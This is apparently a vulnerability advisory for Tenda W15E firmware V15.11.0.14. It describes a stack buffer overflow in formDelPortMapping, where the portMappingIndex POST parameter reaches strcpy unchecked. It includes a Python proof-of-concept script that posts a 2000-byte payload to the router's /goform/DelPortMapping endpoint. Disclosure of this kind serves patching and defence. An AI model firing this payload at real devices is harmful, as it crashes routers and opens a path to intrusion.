- Firmware download website: https://www.tendacn.com/download/detail-2722.html
W15EV1.0 V15.11.0.14
The Tenda W15EV1.0 V15.11.0.14 firmware has a stack overflow vulnerability in the formDelPortMapping
function. The pPortMapIndex
variable receives the portMappingIndex
parameter from a POST request and is directly assigned to strcpy
. However, since the user can control the input of portMappingIndex
, the statementstrcpy((char *)sPortMapIndex, (const char *)pPortMapIndex);
can cause a buffer overflow. The user-provided portMappingIndex
can exceed the capacity of the sPortMapIndex
array, triggering this security vulnerability.
import requests
from pwn import*
ip = "192.168.84.101"
url = "http://" + ip + "/goform/DelPortMapping"
payload = b"a"*2000
data = {
'portMappingIndex':payload,
}
response = requests.post(url, data=data)
print(response.text)